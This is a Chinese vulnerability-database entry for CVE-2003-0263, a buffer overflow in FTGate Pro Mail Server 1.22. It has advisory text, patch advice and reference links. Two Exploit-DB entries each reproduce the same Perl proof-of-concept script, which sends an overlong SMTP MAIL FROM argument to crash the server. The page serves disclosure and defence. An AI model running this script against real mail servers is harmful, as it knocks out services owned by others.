CVE-2003-0263
CVSS7.5
发布时间 :2003-05-27 00:00:00
修订时间 :2016-10-17 22:31:20
NMCOE    

[原文]Multiple buffer overflows in Floosietek FTGate Pro Mail Server (FTGatePro) 1.22 allow remote attackers to execute arbitrary code via long (1) MAIL FROM or (2) RCPT TO commands.


[CNNVD]Floosietek FTGate PRO SMTP MAIL FROM远程缓冲区溢出漏洞(CNNVD-200305-068)

        
        FTGatePro是一款网络共享代理服务程序,支持多种协议。
        FTGatePro邮件服务程序对超长SMTP 'Mail From'命令参数缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出攻击,可能以SYSTEM用户权限在系统上执行任意指令。
        当恶意攻击攻击者发送"MAIL FROM"字段中包含超长字符串的邮件给FTGatePro邮件服务程序时,会发生缓冲区溢出,如果精心构建提交字符串,可能以SYSTEM权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0263
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0263
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-068
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0052.html
(UNKNOWN)  VULNWATCH  20030506 Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328)
http://marc.info/?l=bugtraq&m=105223471822836&w=2
(UNKNOWN)  BUGTRAQ  20030506 Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328)
http://www.securityfocus.com/bid/7506
(VENDOR_ADVISORY)  BID  7506
http://www.securityfocus.com/bid/7508
(VENDOR_ADVISORY)  BID  7508
http://xforce.iss.net/xforce/xfdb/11951
(UNKNOWN)  XF  ftgate-mailfrom-rcptto-bo(11951)

- 漏洞信息

Floosietek FTGate PRO SMTP MAIL FROM远程缓冲区溢出漏洞
高危 未知
2003-05-27 00:00:00 2005-10-20 00:00:00
远程  
        
        FTGatePro是一款网络共享代理服务程序,支持多种协议。
        FTGatePro邮件服务程序对超长SMTP 'Mail From'命令参数缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出攻击,可能以SYSTEM用户权限在系统上执行任意指令。
        当恶意攻击攻击者发送"MAIL FROM"字段中包含超长字符串的邮件给FTGatePro邮件服务程序时,会发生缓冲区溢出,如果精心构建提交字符串,可能以SYSTEM权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Floosietek
        ----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载安装HOTFIX 1330补丁,升级到FTGate Pro Mail Server v. 1.22:
        
        http://www.ftgate.com/

- 漏洞信息 (22568)

Floosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow Vulnerability (EDBID:22568)
windows dos
2003-05-06 Verified
0 Dennis Rand
N/A [点击下载]
source: http://www.securityfocus.com/bid/7506/info

A buffer overflow vulnerability has been reported for Floosietek FTGate PRO mail server. The vulnerability exists when the mail server attempts to process overly long SMTP 'Mail From' arguments. Due to the nature of this vulnerability it may be exploited to execute attacker-supplied code with the privileges of the SYSTEM user.

This vulnerability was reported for FTGate PRO 1.22 Hotfix(1328). It is likely that previous versions are also affected. 

#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the 
# ESMTP Server FTGate, causing the service to stop responding for a short
# Period, where we can actually overwrite the exception handler on the stack allowing 
# A system compromise with code execution running as SYSTEM.
# 
#
# Solution: 
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
# 
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "a" x 2400;


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

		

- 漏洞信息 (22569)

Floosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow Vulnerability (EDBID:22569)
windows dos
2003-05-06 Verified
0 Dennis Rand
N/A [点击下载]
source: http://www.securityfocus.com/bid/7508/info

A buffer overflow vulnerability has been reported for Floosietek FTGate PRO mail server. The vulnerability exists when the mail server attempts to process overly long SMTP 'Rcpt To' arguments. Due to the nature of this vulnerability it may be exploited to execute attacker-supplied code with the privileges of the SYSTEM user.

This vulnerability was reported for FTGate PRO 1.22 Hotfix(1328). It is likely that previous versions are also affected.

#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the 
# ESMTP Server FTGate, causing the service to stop responding for a short
# Period, where we can actually overwrite the exception handler on the stack allowing 
# A system compromise with code execution running as SYSTEM.
# 
#
# Solution: 
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
# 
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "a" x 2400;


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

		

- 漏洞信息

12066
FTGatePro Mail Server Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-05-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站